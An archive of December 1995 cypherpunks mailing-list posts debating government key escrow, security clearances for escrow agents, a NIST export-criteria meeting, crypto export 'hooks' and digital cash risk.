>I'm definitely opposed to GAK, but the conspiracy theory approach to
>considering what it means to employ people with SECRET clearance
>may be getting a bit paranoid.

      In a discussion of governmental efforts to deny presumedly innocent
citizens the assurance that they can conduct their affairs in privacy --
and to require that "trusted," "impartial" escrow agents employ someone
who has been vetted according to undisclosed criteria, the best you can
come up with is this "conspiracy theory" saw? Did *I* invent this
stipulation?

>>From working at an organization that did a lot of government work,
>my understanding of the process of clearing employees is this:
>
>-certain tasks require knowledge or access that must be restricted
>-you have to have a high degree of trust in the people doing those tasks
>-people with money troubles, out-of-control addictions, skeletons in the
> closet, and histories of "troubles" are prime targets for subversion
>-doing a clearance check (in theory) eliminates the possibility that
> these people will be blackmailed/bribed into revealing their secrets

      Therefore, *every* GAK escrow agent *must* employ someone with an
arbitrary clearance level?

>Not that this stuff always works in practice, considering that Aldrich
>Ames <etc.>

      And what protected him? Incompetence, cronyism, corruption, and
ass-covering. Of course, any failures in GAK administration would be
handled differently...

>The point is, if you want to keep your organization's systems secure,
>you need some mechanism to do so. Security clearance is one way;
>banks and other financial institutions do other things (like finger prints,
>background checks, etc.)

      I get the point. I *disagree* with it.

>My big question is, do any of the companies providing Internet services,
>or Internet software, or digital commerce services/software, employ
>any of these security mechanisms on their employees? Comments or
>(preferably) references to actual practices?

      On the *hardware* front, definitely -- if not by law then simply by
practical need. Does the hardware in question *necessarily* apply to every
citizen in America?

Hieronymous

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMUfVr3g0mNE55u1AQE2AwH+Ps6ux/T/jME+yz6NEr2hC02m2j1TalGr
/hfzvIGytpAE3Ld6f0ltjz70RbSFb4mFX1oPbNnDVwDsPo5iSstEiw==
=4PcI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Wed, 6 Dec 95 03:53:25 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
In-Reply-To: <m0tNEsF-00090XC@pacifier.com>
Message-ID: <Pine.3.89.9512060649.A22538-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


One potential "clean room" solution would be to publish precise interface 
specifications for the product. Overseas vendors and users could produce 
their own patches that match the interface. This is of course a kind of 
"hook", and the gov may sabre-rattle about it but I doubt it will stand 
up in court. Certainly publishing specs is no different than publishing 
"Applied Cryptography".
 

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
 (KEY id 1024/80E4AA05) email me for key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Wed, 6 Dec 95 04:01:50 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: re: Secret Clearance
In-Reply-To: <199512060445.FAA22949@utopia.hacktic.nl>
Message-ID: <Pine.3.89.9512060640.A22538-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


I think it's interesting that police and even FBI that normally operate 
"legally authorized" wiretaps do not require SECRET clearance. What 
really goes on here?

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
 (KEY id 1024/80E4AA05) email me for key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Wed, 6 Dec 95 04:10:19 PST
To: cypherpunks@toad.com
Subject: Re: NIST GAK export meeting, short version
Message-ID: <25879.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Just a quick note to explain what the govies claimed was the reason for
the SECRET clearence....

They claimed it was needed so that they can serve a court order
that is SECRET. Obviously, if the order is classified, then no one
without clearence can see it -- the existance of the clearence
is classified.

The main area that they claimed was for FISA orders. FISA stands
for something like Foriegn Intellegence Survellance Act. It is
aimed at catching spies.

The whole topic raises a ton of questions, such as traffic
analysis when your _only_ cleared operator has to process
a request. Plus, since you have to be a US citizen to get
a clearence, how can there be approved foriegn escrow agents?

And the usual, why in hell would a competent spy use
crypto escrowed in the US?

I'll put more in the long report.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 6 Dec 95 04:20:35 PST
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment)
In-Reply-To: <01HYG84E8ZRU9S3QKQ@mbcl.rutgers.edu>
Message-ID: <wklMcgyMc50eEbskld@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.nonpersonal: 5-Dec-95 Re: Geodesic Payment System..
"E. ALLEN SMITH"@mbcl.ru (2487)

> 	All of this is assuming that the digital currency being produced has
> a one-to-one ratio with some "real" currency. If, for instance, the digital
> certificates were indeed bought with a one-to-one ratio from the producer, but
> were traded to others for "real" cash at some market-determined discount, the
> market would incorporate the risk. The traders who were willing to take the
> risk that the certificates were not actually worth one dollar/whatever would
> be able to make a profit by the difference between one digital dollar and one
> "real" dollar. The problem is simplified even more with privately backed
> currencies.

I had assumed that there was a market discount, but it's still not quite
that simple.  It's very hard for markets to deal with *unbounded* risk. 
The biggest problem I see with most of the crypto-cash schemes is that
there is a legitimate scenario -- however low-probability you might
assess it to be -- of break-the-bank catastrophic failure, i.e. in which
someone gains the keys that allow him to essentially print money.  This
kind of low-probability, infinite-cost risk is the kind of thing that
gives underwriters the heebie jeebies.  There's a good reason that most
companies have "Ltd" after their name instead of "Unlimited", in those
countries where that's the naming convention.

Excerpts from mail.nonpersonal: 5-Dec-95 Re: Geodesic Payment System..
Wei Dai@eskimo.com (1749*)

> But if we're converting
> between one eletronic system and another, then cryptographic protocols
> reduce the cost of protection to nearly zero for even small organizations. 

This is probably true, although protocol translation is a notoriously
tricky and subtle business.  But my comments were aimed at the
conversion between electronic and physical monetary systems, not between
different electronic systems.  And, for this purpose, totally
non-Internet mechanisms such as SWIFT or US ACH are, in my view,
"physical" systems, for a number of historical reasons.  If you disagree
with that classification, however, you just push the line down a little
further, but don't change the underlying assessement.  -- NB
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 6 Dec 95 04:15:46 PST
To: cypherpunks@toad.com
Subject: Re: The "Future" Fallacy
Message-ID: <2.2b8.32.19951206121932.00842fec@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:10 AM 12/6/95 -0800, Timothy C. May wrote:

>I found nothing wrong or incorrect with the quote Duncan attributed to Bill
>Gates (I haven't read Gates' book).
>
>I couldn't understand Duncan's koan, shrugged, and moved on.
>
>--Tim May

From my reply to someone called billg@microsoft.com:

>>"Soon any child old enough to use a computer will be able to transmit coded
>>messages that no government on earth will find easy to decipher."
>>
>>DCF

The two "errors" in the sentence are:

1) The use of the future tense.  There are a host of encryption products
available today that are very strong.  Unless you were talking about ease of
use.  Newt Gingrich -- in a similar statement -- was speaking generally
rather than about children and that's where I noticed the error before.  It
is a present not a future capability.

2)  And no government on earth will find easy to decipher is an
understatement.  As I'm sure you know, properly deployed modern cryptography
(or even the 100-year-old technology of one-time-pads) is mathematically
infeasible to break.  Though of course attacks other decryption remain possible.

Both of these are really quibbles rather than substantial criticisms.

DCF

"Who wonders if this is the real BG or one of the 90% of forged messages
mentioned in the National Press Club speech."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Wed, 6 Dec 95 04:54:35 PST
To: cypherpunks@toad.com
Subject: re: Secret Clearance
Message-ID: <28532.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In message Wed, 6 Dec 1995 06:57:12 -0500 (EST),
  Jay Holovacs <holovacs@styx.ios.com>  writes:

> I think it's interesting that police and even FBI that normally operate
> "legally authorized" wiretaps do not require SECRET clearance. What
> really goes on here?

You can't walk the halls of the FBI headquarters without a clearance.

The RBOCs do have cleared people that perform the taps.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 7 Dec 95 08:00:59 PST
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: 1)Age etc CA 2)Swedish Digicash
Message-ID: <199512071601.IAA23556@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:06 AM 12/7/95 -0500, Duncan Frissell wrote:
> Is there an existing Post Office Bank in Sweden?  If so, can foreigners open
> accounts? 

While any foreign account is of course better than any home country
account, Sweden is not really a place that I would like to keep
my money.  High taxes, rigid controls, intrusive and unpredictable
government, and, most importantly, the country has repeatedly 
teetered on the edge of bankruptcy.

I would wait for some more solvent foreign country to get into digicash.

More to the point -- few people will accept or spend digicash 
unless those unreasonable charges come right down.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Wed, 6 Dec 95 08:15:37 PST
To: Duncan Frissell <frissell@panix.com>
Subject: Re: The "Future" Fallacy
Message-ID: <9512061617.AA03020@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Duncan Frissell 

2)  And no government on earth will find easy to decipher is an
understatement.  As I'm sure you know, properly deployed modern cryptography
(or even the 100-year-old technology of one-time-pads) is mathematically
infeasible to break.  Though of course attacks other decryption remain 
possible.
..................................................

I see what you mean.  When I read his statement, I focused on the "will be able 
to transmit coded messages".

I was thinking about the efforts of the govmt to prevent it, and about how 
nevertheless even a 10-year old will be able to accomplish it in spite of the 
efforts against it (GAK).

  ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 6 Dec 95 05:21:21 PST
To: holovacs@styx.ios.com (Jay Holovacs)
Subject: Re: Secret Clearance
In-Reply-To: <Pine.3.89.9512060640.A22538-0100000@styx.ios.com>
Message-ID: <199512061318.IAA11175@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I think it's interesting that police and even FBI that normally operate 
> "legally authorized" wiretaps do not require SECRET clearance. What 
> really goes on here?

??
Feeb's have TS clearances, at least the ones I've dealt with.
I strongly doubt any don't..

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 6 Dec 95 06:28:04 PST
To: cypherpunks@toad.com
Subject: ERA_sur
Message-ID: <199512061429.JAA08877@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   There's implicit boost for encryption in the controversial
   "undeleting" of personal files on Jean Lewis's floppy,
   subpoenaed by Whitewater investigators.

   Peter Wayner has a thread about it on Cyberia-L.

   NYT had a brief about it yesterday, WSJ an editorial today.


   ERA_sur












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Wed, 6 Dec 95 06:38:00 PST
To: pfarrell@netcom.com
Subject: NIST GAK export meeting, Long version part 1
Message-ID: <34717.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


NIST Key Export meeting, December 5, 1995 Long version, Part 1 of N
This covers the criteria, except interoperability.

(To keep TCMay's prediction from becoming true, I'll put this out in parts) 


This really needs a hypertext media. I'll build one for html page. Please
bear with me on this, pure ASCII mail version.
This is a write-up of stuff I left out of the summary.
I'll merge them together on my nistpage, probably Friday.
You've already seen the short write up.

There is a fair amount of information on the NIST web server. Use url:
< http://csrc.ncsl.nist.gov/keyescrow/>

As David Lesher noted, one of the most significant things was obvious in
the parking lot.  Unlike September's meeting, this time it was empty.
Inside the hall, it was obvious that no one came. It was packed in
September, and now, entire rows were empty. I'm bad at guessing numbers,
but its easy  to guess that only 1/3 as many people showed. Maybe less.

>The meeting was hosted by Ed Roback of NIST,

The meeting was in general a repeat of September's meeting, and similar
meetings that have been going on for years. Both sides talk past each
other. I think this has degenerated into a parallel with the abortion
debate. There is no common ground.


>He said that they have studied the encryption that is supposed to be widely available on the Internet.
>He said that viewed by crypto experts, not much is very good. He mentioned "two incidents" where
>Netscape had weak implementations. He feels that companies will not trust software over the 'net. that
>they "want the US Government to say that 'this is good enough'."

I assume that the "two incidents" don't count breaking RC4-40.  I can't
remember two Netscape security incidents, unless he means to count RJC's
buffer overflow, all I can remember is Ian's key generation problem.

>Clint Brooks, of NSA, then went over the revised criteria. He claimed that they
>were surprised at the industry concern over "one product" for worldwide markets.

He stated that they were addressing "not domestic policy, per se, but we
keep wrapping around" because of the 'one product' issue.

The criteria are on the NIST page,
url: <http://csrc.ncsl.nist.gov/keyescrow/criteria.txt>

They handed out a guide to the changes in the criteria between September
and now. This is available from NIST as url:
<http://csrc.ncsl.nist.gov/keyescrow/bground.html>

Here is a portion of it:
Old Criterion 1.     Moved to #7;
Old Criterion 2.     Moved to #8;
Old Criterion 3.     Split into #1 and #2
Old Criterion 5.     Moved to #10
Old Criterion 6.     Moved to #9;
Old Criterion 7.     Moved to #5;
Old Criterion 8.     Moved to #6;
Old Criterion 9.     Deleted.
Old Criterion 10.    Moved to #3;

Only in Washington. Oh yeah, they also clarified a lot of the wording.

Ideas that I thought important enough to make notes of concerning the
criteria:

These criteria do not address either hardware nor non-escrow encryption.
Export controls of these are not changed, they can be exported with the
current procedures.

Brooks said that these rules are not applicable to the protection of
internal data for US corporations, even for overseas locations of US firms.
He said that getting permission to export for _internal corporate use_ is
easy, if it is to protect corporate secrets and for internal communication.
I took this to mean that a multi-national, US-based corporatgon can get a
permit for ViaCrypt and export it for their own use. [later in the day,
some people mentioned that this isn't nearly as easy as Brooks claimed.]

He said that the intent in the new wording is flexibility. They don't want
to prescribe implementation details, he wants industry to invent what
sells. He specifically stated that the meetings were not about setting
standards. This caused at least a fair amount of confusion, probably due to
the fact that NIST used to be called National Bureau of Standards, and NBS
set standards all the time. For example, a couple of folks were interested
in interoperability, say between a Netscape encryption system and one made
by, say, Microsoft. This meeting did not address this level of
interoperability.

about #2, "The product's key escrow cryptographic functions shall be
inoperable until the key(s) is escrowed in accordance with #3." Brooks said
that the intent was to allow vendors to make a single product that doesn't
activate the key-escrow function if not needed. The idea was that when the
keys are escrowed, the encryption engine would be activated. He also said
that "manufacturers may not want to be in the key escrow business" and
would therefore want to ship products that could be activated by a third
party escrow agent.

While talking about #3, "3. The product's key escrow cryptographic functions' key(s)
     shall be escrowed with escrow agent(s) certified by the U.S.
     Government, or certified by foreign governments with which
     the U.S. Government has formal agreements consistent with
     U.S. law enforcement and national security requirements."

He stated that this does not preclude the use of "other agents." This
became a major issue throughout the day. Ken Mendelson, staff attorney at
TIS, asked (roughly) "Under what authority does the US Government grant
certification to agents?" The response was a run around. Another hot issue
was whether you can "hold your own keys" rather than using a third party.
Seems that the corporate users are arguing that they want to hold their own
keys, and the government reacted to that favorably (not unfavorably?).
[Later in the day, Geoff Greiveldinger was asked if US citizens have the
right to hold their own keys. Geoff was forced to admit that, "yes, you can
hold your own keys"]

#5, "5.    The product's key escrow feature shall allow access to the
      key(s) needed to decrypt the product's ciphertext regardless
      of whether the product generated or received the ciphertext."

Contains a significant change that was not discussed in September. It means
that having the key for either end is sufficient. Brooks conceded that this
was a big change, but claimed it was needed. The claim that one-ended
surveillance is easier is most likely true.  It clearly is easier if one
end is US based and using GAK and the other is foreign where there is
respect for civil liberties.

He even claimed that it made the system less intrusive: His argument was
roughly:

Lets say they are snooping on me.  With one-ended, they can read all of my
messages, to and from, without needing the keys of my correspondents. (lets
pick Geoff G. as an arbitrary correspondent) With two ended, they'd have to
get both my key and Geoff's, and then they could read all of the messages
Geoff gets or sends.

I said it was _their_ argument. Seems to me to be groundless, unless they
got the keys of everyone in the chain, all of the folks that I talk to, all
of the folks that everyone I talk to, etc.

on "7.    The product's key escrow cryptographic functions shall use
      an unclassified encryption algorithm with a key length not
      to exceed sixty-four (64) bits."

This is really aimed at session keys, or at least non-RSA keys. I suggested
that they really needed some wording that make it clear.

>He said that the 64-bit key limit is not meant to restrict RSA keys to
>64-bits, but rather to restrict the session keys that are encrypted using
>RSA. Unspoken was the assumption that the 2000 bit RSA secret key would have to be escrowed.

on "8.    The product's key escrow cryptographic functions shall not
      provide the feature of multiple encryption (e.g., triple-
      DES)."

He pointed out that the wording used to say "prevent" and now just says
"not provide".  He acknowledged that "prevent" was impossible.

on "9.    The product's key escrow cryptographic functions shall
      interoperate only with key escrow cryptographic functions in
      products that meet these criteria, and shall not
      interoperate with the cryptographic functions of a product
      whose key escrow encryption function has been altered,
      bypassed, disabled, or otherwise rendered inoperative."

Brooks said that this was intended to allow multiple modes, such as
compatibility with other encryption schemes. Of course, he said, the other
modes are subject to export restrictions.

Somewhere in the discussion, Ed Appel took over for Brooks. Appel is
"Director of Counter Intelligence Programs, National Security Council, The
White House" He was introduced as FBI.

>There were some interesting (and bad IMHO) implications of interoperability.
I'll cover them more in the next section

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Dec 95 08:29:13 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
Message-ID: <aceb04e0120210040cd0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:06 AM 12/6/95, jim bell wrote:

>>"Crypto hooks," basically the scheme you are proposing, were thought of by
>>the authorities and are not a bypass of the crypto export laws.
>>--Tim May
>
>
>I'm not saying they are a "bypass" of the laws.  Rather, I'm saying that
>if the goal is to:
>
>1.  Let companies like Netscape make foreign sales.
>
>2.  Still comply with the letter of the law.
>

And I'm saying that your proposal does NOT comply with the letter of the
law. There's no point in arguing this, as the facts are clear. Consult the
ITARs and the previous discussions here and elsewhere on the practice of
leaving "hooks" that crypto modules can later be attached to.


>If the USG tries to take the position that "any program which can be
>modified into another program that gets around GAK is prohibited from
>export," then they're going to have to stop allowing the export of
>pre-formatted floppy disks because they're likewise an XOR away from PGP.
>
>So we're back to square one:  Does the USG intend to allow ANY programs to
>be exported?

No, the USG has not (yet at least) prohibited export of blank programs or
disks. The "no hooks" rule has some ambiguities, but is by no means quite
this dumb.

All I'm saying is that you need to look at what the laws are, and how they
have affected existing products and companies, before announcing a
"solution."

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 6 Dec 95 09:49:46 PST
To: jimbell@pacifier.com (jim bell)
Subject: Re: Solution for US/Foreign Software?
In-Reply-To: <m0tNEsF-00090XC@pacifier.com>
Message-ID: <9512061750.AA07635@krypton.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> I'm not saying they are a "bypass" of the laws.  Rather, I'm saying that
> if the goal is to:
> 
> 1.  Let companies like Netscape make foreign sales.
> 
> 2.  Still comply with the letter of the law.

It takes more than one or two people to coordinate an international effort.
Once more than a few people know about it, it becomes "company policy" or
"corporate objective", in which case, the NSA/DoS will eventually figure it
out and start levying heavy fines and jailing the individuals.

The main point is that there is no such thing as the "letter of the law".
What they enforce is much broader than that, and how they enforce it is much
more subtle than clear-cut criminal prosecution.  Therefore, you cannot just
use literal loop holes just because it's not clear, because the law they are
enforcing is not clear either.

This response should almost be an FAQ for this crowd.

Ern





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 6 Dec 95 06:45:57 PST
To: <cypherpunks@toad.com
Subject: re: NIST GAK export meeting, sv
Message-ID: <9512061445.AA14166@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


"Hieronymous" says:
>       (Thanks for the summary, Pat.)
>       This last bit is really rich. I can't think of a single publically
> defensible reason for the stipulation that every escrow agent must employ
> someone with SECRET clearance, but I *can* think of a publically
> indefensible reason for it -- to facilitate those spooky non-court wiretap
> authorizations that've been alluded to in the fine print of the GAK
> proposals.

This is probably one reason. Another is that they could shut down an
escrow agent at a moment's notice by pulling the clearances. We
haven't seen the other requirements, but an interesting question is
what happens when an escrow agent goes out of business.

Speaking for myself....

 

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 6 Dec 95 10:00:28 PST
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: The "Future" Fallacy
In-Reply-To: <Pine.SUN.3.91.951206042314.18935A-100000@polaris.mindport.net>
Message-ID: <9512061801.AA07656@krypton.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> > > Bill Gates (like Mister Newt before him) committed what I call the Future
> > > Fallacy in "The Road Ahead."  Page 106.
> > >
> > > "Soon any child old enough to use a computer will be able to transmit
> > > coded messages that no government on earth will find easy to decipher."
> > >
> > > Billg is an optimist.
> >
> > I found nothing wrong or incorrect with the quote Duncan attributed to Bill
> > Gates (I haven't read Gates' book).
>
> I think Duncan was mad at the 'soon.'  Why not today?

I think I can answer this question because I was an obnoxious little
hacker with an Atari 800 when I was a kid.  The only thing I did not
have was a modem and an Internet connection (thus ability to read
sci.crypt.research etc ...)

I did have arbitrary precision math libraries (although I did not
have any engineering concept of "libraries"), and I had written some
non-trivial scrambling code (it's not RSA, of course).  I am, by no
means, a super-smart person.  Therefore, it is not a stretch to
believe that kids today can perform powerful encryption in the
privacy of their own homes.

Therefore, to Bill G and his "prophecy": "been there, done that" ...
(Apologies to those who hate that phrase; I hate it too, but it is
so obnoxious that it gets the point across.)

Ern





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Dec 95 08:50:35 PST
To: cypherpunks@toad.com
Subject: Compliance Audits
Message-ID: <aceb087813021004e525@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(This is just a tangential thought, inspired by someone's commentary. Not a
substitute for first principles argument.)

At 3:53 PM 12/6/95, Brad Dolan wrote:

>Firearms dealers are requred to keep records of purchases.  In theory
>(and by law) they don't pass these records along to the authorities
>except in response to specific inquiries.
>
>However, in the last couple of years there have been numerous reports of
>mass copying of records by BATF or surrogates (specifics on request).
>
>And when a firearms dealer goes out of business, all records go to the BATF.
>
>So there is something of a precedent.

One FFL holder reported someplace (?) that when he drops out of the
business--soon, as the licensing and reporting requirements, plus the fees,
have risen a lot--he expects to have an accidental "office fire" to destroy
the boxes of records he's kept for the last 20 years.

I think BATF is currently too preoccupied with other more pressing matters
to go around and conduct "compliance audits," but such audits are likely to
increase in the future. (Especially as the new FFL licensing rules and fees
squeeze the number of FFL holders down to a "manageable" level, which was
one of the stated reasons for cranking up the fees and tightening the
reporting requirements a while back.)

The connection with crypto and key escrow is that licensed escrow agents
(Big Brother Inside) will likely face compliance audits. Some random amount
of traffic may even be opened to ensure compliance.

(More speculatively, the rules may be written so that compliance audits are
done on the traffic of end-users, with some fraction opened and the
contents measured to ensure they are readable. The old "Use a random
number, go to jail" scenario.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Wed, 6 Dec 95 10:57:43 PST
To: tcmay@got.net (Timothy C. May)
Subject: Re: Solution for US/Foreign Software?
Message-ID: <m0tNOTZ-0008yNC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>At 8:06 AM 12/6/95, jim bell wrote:
>
>>>"Crypto hooks," basically the scheme you are proposing, were thought of by
>>>the authorities and are not a bypass of the crypto export laws.
>>>--Tim May
>>
>>
>>I'm not saying they are a "bypass" of the laws.  Rather, I'm saying that
>>if the goal is to:
>>
>>1.  Let companies like Netscape make foreign sales.
>>
>>2.  Still comply with the letter of the law.
>>
>
>And I'm saying that your proposal does NOT comply with the letter of the
>law. There's no point in arguing this, as the facts are clear. Consult the
>ITARs and the previous discussions here and elsewhere on the practice of
>leaving "hooks" that crypto modules can later be attached to.


NO!  You didn't read my commentary carefully enough.   These "hooks" (your words) will, in effect, already be connected to encryption software weak enough to make NSA happy.  You know, 40 bit keys or something like that. 
But instead of being in one large file, embedded into a program, it'll be  TWO files.  Simple programming change.  Everything that implements/defines/limits the encryption to 40 bits will be in the smaller file.  
This really isn't a "hook," it's an internal connection between two portions of the same program. (actually, it wouldn't need to be in two separate files; a file which implements a patch for the first file would work great.)

It'll be exportable, because its key size is "acceptable."  At the time the export license is requested, the replacement module to increase key size probably won't even  exist, in order to avoid giving the USG an excuse to deny the export license.   After the license is obtained, the replacement module is written and shipped to domestic users.

I fully realize the USG won't "like" this kind of thing.  But if they are trying to take the position that certain kinds of encryption software CAN be exported, and some can't, they're going to have to approve SOME programs for export, using criteria which at least pretend to be objective.  

In view of the nearly limitless possibility of patches, how would YOU distinguish between programs?  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 6 Dec 95 07:37:43 PST
To: cypherpunks@toad.com
Subject: Re: No More Netscape Comments from Me
Message-ID: <v02120d10aceb5449cdea@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>So, have fun riding the Great Internet Bubble of 1995!

Yeah... I wonder what the price of Netscape puts around, say, March are
these days...

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 6 Dec 95 10:40:21 PST
To: cypherpunks@toad.com
Subject: Re: Barring access to Netscape
Message-ID: <2.2b7.32.19951206184122.00836cd4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:28 PM 12/1/95 -0500, you wrote:

>You can get your server to simply put that at the top of every page
>served to a Netscape client, followed by a horizontal line and the
>normal web page. It should be easy to put together the hacks to do
>that and get them out to lots of people. Watch how fast people would
>switch from Netscape, especially were it widely deployed. You would
>then watch a fast fall in Netscape stock, which would likely piss Jim
>Clark off far more than anything else one could do.

This type of page hack is pretty easy.  Take a look at _HTML & CGI
Unleashed_ from Netsams press.  Page 410 has a script that can be easily
modified to do something similar.  (Great book, but lacks some of the more
advanced server redirect tricks I have seen elsewhere.)  The example is for
displaying an optional display for browsers that cannot deal with image
maps.  It can be altered to do the same to any browser.

>We need HTML 3.0 capable browsers for all platforms, though.

They (the W3O) need to agree what HTML 3.0 consists of before that will
happen soon...

|       What is the Eye in the Food Pyramid?      | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 6 Dec 95 07:41:53 PST
To: Nathaniel Borenstein <cypherpunks@toad.com
Subject: Re: Geodesic Payment Systems?  (was Re: Meeting notes from ANSI X.9 Meeting onElectronic Payment)
Message-ID: <v02120d30aceb5c57b23c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Once again, Hettinga shoots from the hip, and hits an expert instead...
;-)

At 9:07 AM 12/5/95, Nathaniel Borenstein wrote:

>There are some interesting unspoken assumptions here.  To calculate
>anyone's "cost" on a transaction requires the complex amortization of
>costs over many transactions, with assumptions/projections about the
>transaction volume.  I have no idea where you came by either of your
>numbers, MTB's or FV's, but I can tell you that your guess about FV is
